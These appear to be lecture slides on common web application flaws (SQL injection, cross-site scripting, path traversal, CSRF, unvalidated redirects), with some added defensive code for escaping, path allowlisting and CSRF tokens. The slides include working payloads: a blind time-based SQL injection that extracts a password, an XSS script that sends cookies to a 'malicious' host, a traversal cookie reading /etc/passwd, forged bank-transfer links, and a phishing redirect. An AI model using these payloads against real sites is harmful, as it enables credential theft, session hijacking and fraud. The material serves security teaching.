
Most dangerous web application errors

Security of Information Systems

Agenda
1. SQL Injection
2. Cross Site Scripting (XSS)
3. Path Traversal
4. Cross Site Request Forgery (CSRF)
5. Unvalidated Redirect

SQL Injection

SQL Injection
http://example.com/items.php?id=2
SELECT title, description, body FROM items WHERE ID = 2

SQL Injection
http://example.com/items.php?id=2 or 1=2
SELECT title, description, body FROM items WHERE ID = 2 or 1=2

SQL Injection (Blind)


IF(expression, true, false)

UNION SELECT IF(
    SUBSTRING(user_password,1,1) = CHAR(50),           -- expression
    BENCHMARK(5000000, ENCODE('MSG','by 5 seconds')),  -- true
    null)                                              -- false
FROM users WHERE user_id = 1;

SQL Injection (Blind)


http://example.com/items.php?id=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50), BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

If the database takes noticeably longer to respond, we can infer that the first character of the password of the user with user_id = 1 is '2' (CHAR(50)).

SQL Injection
Defense
Prepared Statements (Parameterized Queries)

String query = "SELECT account_balance FROM user_data WHERE user_name = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, name);

Stored Procedures

CallableStatement cs = connection.prepareCall("{call accountBalance(?)}");
cs.setString(1, custname);

Escaping all user supplied input

Cross Site Scripting

Cross Site Scripting


http://example.com/img?src=url
<img src="url">

Cross Site Scripting


http://example.com/img?src=dont.exists" onerror="alert(1)
<img src="dont.exists" onerror="alert(1)">

Cross Site Scripting


http://example.com/filename

<?php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?>

Not found: filename

Cross Site Scripting


http://example.com/<script type=text/javascript>i=new Image();i.src='http://malicious/'+document.cookie</script>

Not found: <script type=text/javascript>
i=new Image();
i.src='http://malicious/'+document.cookie
</script>
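Added example (not the deck's code) of the output-encoding defence for the two reflections above: the `img?src=` attribute and the "Not found:" text, with an extra URL-shape check on `src` as defence in depth.

```python
import html
from urllib.parse import urlsplit

def render_img_unsafe(src):
    # Vulnerable, as in the deck's img?src= page: the value is pasted into the attribute,
    # so a double quote in it closes src and whatever follows becomes a new attribute.
    return '<img src="' + src + '">'

def render_img_escaped(src):
    # Defence: HTML-attribute-encode the value; quotes become &quot; and cannot close src.
    return '<img src="' + html.escape(src, quote=True) + '">'

def render_img_validated(src):
    # Defence in depth: src should be an http(s) URL; anything else is replaced before encoding.
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        src = "about:blank"
    return render_img_escaped(src)

def render_not_found_escaped(request_uri):
    # Defence for the deck's "Not found: " page: encode the reflected URI for HTML text context,
    # so <script> arrives in the browser as literal text, not markup.
    return "Not found: " + html.escape(request_uri, quote=True)
```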

Path Traversal

Path Traversal
http://example.com/get.php?file=report.pdf
http://example.com/get.php?file=get.php
http://example.com/get.php?file=../get.php
http://example.com/get.php?file=/etc/passwd

Path Traversal
<?php
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
    $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/php/templates/" . $template );
?>

Path Traversal
Request
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Response
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
php:f8fk3j1OIf31.:182:100:Developer:/home/users/php/:/bin/csh
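Added example (not the deck's code) of how the TEMPLATE cookie should be mapped to a file: an allowlist on the name plus a canonical-path containment check against the deck's template directory.

```python
import os
import re

TEMPLATE_DIR = "/home/users/php/templates"   # base directory from the deck's include()
TEMPLATE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.php$")

def resolve_template(name, base=TEMPLATE_DIR, default="blue.php"):
    """Map a TEMPLATE cookie value to a path guaranteed to lie under base, or None."""
    if not name:
        name = default
    # First line of defence: the only shape a template name is allowed to take.
    # This alone rejects "../", absolute paths, NUL bytes and encoded variants.
    if not TEMPLATE_NAME.match(name):
        return None
    # Second line: canonicalise (resolves ".." and symlinks) and verify containment,
    # so a future relaxation of the regex still cannot escape the directory.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate
```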

Cross Site Request Forgery

Cross Site Request Forgery


Alice sends $100 to Bob
POST http://bank.com/transfer.do HTTP/1.1
...
Content-Length: 19

acct=BOB&amount=100

Cross Site Request Forgery


Alice sends $100 to Bob
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

Cross Site Request Forgery


What if?
GET http://bank.com/transfer.do?acct=MARIA&amount=100000 HTTP/1.1

Cross Site Request Forgery


What if Alice gets an email from Maria?
Hello Alice! View my pictures!

Cross Site Request Forgery


What if Alice gets an email from Maria?
Hello Alice!
<a href=http://bank.com/transfer.do?acct=MARIA&amount=100000>View my pictures!</a>

Cross Site Request Forgery


What if Alice opens malicious website?
<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
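Added example (not the deck's code) of the synchronizer-token defence for `transfer.do`: a constructed in-memory handler that refuses GET for state changes and accepts a POST only when it carries the token tied to the caller's session, which a link or `<img>` from Maria's page cannot supply.

```python
import hmac
import secrets

class TransferHandler:
    """Constructed stand-in for bank.com/transfer.do; sessions and tokens live in memory."""

    def __init__(self):
        self.sessions = {}    # session_id -> per-session CSRF token
        self.transfers = []   # (acct, amount) pairs that were actually executed

    def new_session(self):
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = secrets.token_urlsafe(32)
        return sid

    def render_form(self, sid):
        # The bank's own page embeds the token; a cross-site page cannot read it.
        return '<input type="hidden" name="csrf" value="%s">' % self.sessions[sid]

    def transfer(self, method, sid, form):
        # Return an HTTP-style status: state change only via POST with a valid token.
        if method != "POST":
            return 405
        expected = self.sessions.get(sid)
        token = form.get("csrf", "")
        if expected is None or not hmac.compare_digest(expected.encode(), token.encode()):
            return 403
        self.transfers.append((form["acct"], form["amount"]))
        return 200
```

The session cookie is still sent by the browser on the forged request, which is exactly why the check must rely on the token and not on the cookie alone.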

Unvalidated Redirect

Unvalidated Redirect
$redirect_url = $_GET['redir'];
header("Location: " . $redirect_url);

Unvalidated Redirect
Email to Alice: Greetings from your Bank! Internet Banking Log In

Unvalidated Redirect
Email to Alice:
Greetings from your Bank!
<a href=https://www.53.com/?a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir=www.evilbank.com&param=F1czz0Kz00lL_5g>Internet Banking Log In</a>


Thank you

https://www.owasp.org/index.php/Blind_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/Path_Traversal
https://www.owasp.org/index.php/CSRF
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://www.53.com/site/global/ib-login.html
